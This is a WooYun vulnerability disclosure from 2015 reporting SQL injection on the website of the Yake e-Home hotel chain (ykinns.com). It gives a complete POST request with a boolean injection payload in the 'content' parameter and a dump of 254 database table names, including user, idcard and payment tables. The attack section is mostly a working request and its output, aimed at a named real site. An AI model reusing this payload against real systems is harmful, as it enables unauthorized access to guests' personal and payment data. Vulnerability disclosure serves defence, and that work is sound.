当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162001

漏洞标题:雅客e家快捷酒店sql注入(泄露大量数据啊!)

相关厂商:雅客e家快捷酒店

漏洞作者: 不败顽童

提交时间:2015-12-17 12:52

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

我想说这254张tables,还有我不能看到的东西么?
以后还能不能愉快的开房了?

详细说明:

POST /crs/internalMsgInfoList.html HTTP/1.1
Content-Length: 151
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.ykinns.com:80/
Cookie: JSESSIONID=0F35D01CD527AD63EF559BD18BEA2F68; JSESSIONID=8E9589F5903E9046C30649F7273752D5
Host: www.ykinns.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
acceptTime=4111111111111111&button=%e6%90%9c%e7%b4%a2&content=-1'%20OR%203*2*1%3d6%20AND%20000208%3d000208%20--%20&msgtype=0&page=1&sendTime=1&status=0

漏洞证明:

2015-12-16_19-08-36.jpg







2015-12-16_19-09-18.jpg




254张tables,呵呵。。
Database: chain702
[254 tables]
+-------------------------------+
| order                         |
| user                          |
| accountingtitle               |
| acctrecoverpoint              |
| adinfo                        |
| adtype                        |
| agreementcompany              |
| agreementcompany_view         |
| agreementtype                 |
| assuretype                    |
| attrs                         |
| attrvalues                    |
| audit                         |
| auth_i                        |
| autoupuserlevel               |
| backroomrecover               |
| bigmenu                       |
| bills                         |
| brands                        |
| businessstatistic4day         |
| businessstatisticsdailyreport |
| centerpower                   |
| changecard                    |
| checkroom                     |
| city                          |
| cityview                      |
| clearhouserecord              |
| clearhouseset                 |
| clearroomrecords              |
| clientmac                     |
| comefrom                      |
| comments                      |
| companyvoucher                |
| compensationrecord            |
| complaintsearch_view          |
| complaintstatus               |
| conferenceorder               |
| conferenceroom                |
| consumergoods                 |
| consumptions                  |
| consumptiontype               |
| controltype                   |
| crfolder                      |
| croomstats                    |
| crpara                        |
| crreport                      |
| crreport_shoucang             |
| currencytype                  |
| custacct                      |
| custacct_11                   |
| custacct_20141105_708616      |
| custacct_invoice              |
| custacctcheckout              |
| customdept                    |
| datadictionary                |
| dayrentforfree                |
| dayreport                     |
| dayreportitem                 |
| dayreportmonth                |
| dayreportyear                 |
| dayturnover                   |
| department                    |
| dept                          |
| dgoods                        |
| dgoods_20150104               |
| downtown                      |
| dynamichouse                  |
| dynamichouseprice             |
| emp                           |
| equipment                     |
| equrepair                     |
| exchange                      |
| exchange_view                 |
| floor                         |
| gatecard                      |
| gateway                       |
| generalstatistic              |
| generalstatistic_invoice      |
| giftPresent                   |
| goods                         |
| gorder                        |
| gorderdetail                  |
| grouppaytemplate              |
| gtype                         |
| guest_view                    |
| horder                        |
| horder_11                     |
| horder_view                   |
| hotel                         |
| hotelcalendar                 |
| hotelzone                     |
| hourhouse                     |
| house                         |
| house_view                    |
| houseprice                    |
| housestatus                   |
| housetype                     |
| housetypestatistic            |
| idcard                        |
| iftype                        |
| incre_table                   |
| industry                      |
| internalcommunicationinfo     |
| invgoods                      |
| invoiceappend                 |
| keeper_view                   |
| leaveinfo                     |
| livegroup                     |
| livingcusthis                 |
| livingcusthis_invoice         |
| log                           |
| loginfo                       |
| mail                          |
| mainmenu                      |
| manager                       |
| manager_view                  |
| managerdiscount               |
| market                        |
| mealticket                    |
| membercoupon                  |
| memberzone                    |
| memberzone_wx                 |
| menu                          |
| message                       |
| microblogbind                 |
| mob_access                    |
| mob_problem                   |
| mobilepower                   |
| monthstatistic                |
| msgtype                       |
| nations                       |
| news                          |
| news_view                     |
| newsimplelog                  |
| newtype                       |
| notice_view                   |
| oauthinfo                     |
| oldreport                     |
| onlineservice                 |
| operatingincome               |
| operatordictionary            |
| operatoryjtj                  |
| order_11                      |
| pagepower                     |
| paratype                      |
| partsettlerecover             |
| payment                       |
| permission                    |
| permissionlog                 |
| personcome                    |
| planreason                    |
| portalpower                   |
| power                         |
| powermacbind                  |
| preauth                       |
| priceagreement                |
| priceplan                     |
| project                       |
| project20130403               |
| projectprice                  |
| projecttype                   |
| projecttypes                  |
| publicaccount                 |
| ratecode                      |
| ratecodedetail                |
| ratecodedetails               |
| ratetype                      |
| reason                        |
| reason_view                   |
| reasondictionary              |
| rechargevalue                 |
| rechargevaluediscount         |
| rent                          |
| rentleave                     |
| rentleave_view                |
| rentleavestatus               |
| repairlevel                   |
| reportmapping                 |
| resetuserpwdback              |
| room                          |
| roomall                       |
| roomcount                     |
| roomdaydata                   |
| roomrate                      |
| roomstatistics                |
| roomstatus_view               |
| roomtype                      |
| rpt_memberconsumer            |
| saleperson                    |
| salseanalysis                 |
| score                         |
| scoreback                     |
| scoreruleexp                  |
| scoretohouse                  |
| sendsmsginfo                  |
| sequence                      |
| settleacct                    |
| settleacct_11                 |
| settleconference              |
| sgoods                        |
| shift                         |
| shifthandover                 |
| simplegroup                   |
| simplegroup_11                |
| simplegroup_view              |
| smsgdetails                   |
| smsginfo                      |
| smsgmoinfo                    |
| smsgtype                      |
| smsgtypedetails               |
| specialevent                  |
| specialhouseprice             |
| statisticitem                 |
| statisticitem_invoice         |
| stopandrepairreason           |
| stoproomreport_view           |
| store                         |
| supplier                      |
| supplier_wms                  |
| sys                           |
| sys_wx                        |
| sysctrl                       |
| systemlog                     |
| systemlog_view                |
| task                          |
| telebill                      |
| tempinfo                      |
| thirdportal                   |
| ticketset                     |
| tickettransfer                |
| tickettype                    |
| tmember                       |
| totalaccount                  |
| transfer                      |
| user_view                     |
| userback                      |
| userblackinfo                 |
| usercardprice                 |
| userhotelid                   |
| userlevel                     |
| userlevel_bck                 |
| userpreference                |
| userrelorder                  |
| userrelorder_11               |
| userrelorder_user_view        |
| userscore                     |
| userscorerule                 |
| userstatistic                 |
| vacctdetail                   |
| virtualacct                   |
| wakeuproom                    |
| workacct                      |
| workrecord                    |
| wrs_style                     |
+-------------------------------+

修复方案:

屏蔽特殊字符

版权声明:转载请注明来源 不败顽童@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评价